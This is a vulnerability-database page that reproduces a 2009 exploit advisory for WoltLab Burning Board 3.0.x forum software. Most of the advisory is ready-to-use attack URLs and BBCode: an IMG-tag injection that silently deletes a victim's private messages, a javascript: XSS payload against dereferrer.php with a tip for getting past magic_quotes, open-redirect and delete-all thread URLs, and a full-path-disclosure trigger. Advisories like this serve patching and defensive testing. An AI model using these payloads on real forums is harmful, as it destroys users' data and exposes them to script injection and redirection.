Lucene search

K

woltlab burning board 3.0.x - Multiple Vulnerabilities

🗓️ 09 Mar 2009 00:00:00Reported by StAkeRType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 25 Views

Woltlab Burning Board 3.0.x - Multiple Remote Vulnerabilities including BBCode IMG, XSS, Delete PM, Full Path Disclosure, and URL Redirectio

Show more
Related
Code
ReporterTitlePublishedViews
Family
OpenVAS
WoltLab Burning Board Cross-Site Request Forgery Vulnerability
16 Sep 200900:00
openvas
OpenVAS
WoltLab Burning Board CSRF Vulnerability
16 Sep 200900:00
openvas
Cvelist
CVE-2008-7192
9 Sep 200919:00
cvelist
Prion
Cross site request forgery (csrf)
9 Sep 200919:30
prion
CVE
CVE-2008-7192
9 Sep 200919:30
cve
NVD
CVE-2008-7192
9 Sep 200919:30
nvd
+---------------------------------------------------------------------------+
| Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities               |
+---------------------------------------------------------------------------+
| by Juri Gianni aka yeat - staker[at]hotmail[dot]it                        |
| thanks to s3rg3770                                                        |
+---------------------------------------------------------------------------+

# Vulnerabilities: BBCode IMG / XSS / Delete PM / Full Path Disclosure / URL Redirection


# BBCode IMG Tag Script Injection
# [img]http://[host][/img]


# Delete Private Messages (BBCode IMG Tag Script Injection)

# Insert into a (forum message/private message/your signature) the code below:
# [img]http://[host]/[path]/wbb/index.php?page=PM&action=delete&pmID=[ID]&folderID=0[/img]
# The fake image doesn't show errors.


# Cross Site Scripting 

# http://[host]/[path]/wcf/acp/dereferrer.php?url=javascript:alert("Example");
# you can bypass the magic_quotes_gpc with String.FromCharCode function.


# URL Redirection

# http://[host]/[path]/wcf/acp/dereferrer.php?url=http://[host]
# http://[host]/[path]/wbb/?page=ThreadAction&action=deleteAll&boardID=1&url=[local URL]


# Full Path Discloscure 

# http://[host]/[path]/wbb/index.php?page=[]
# it works on < 3.0.8 version only.

# milw0rm.com [2009-03-09]

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo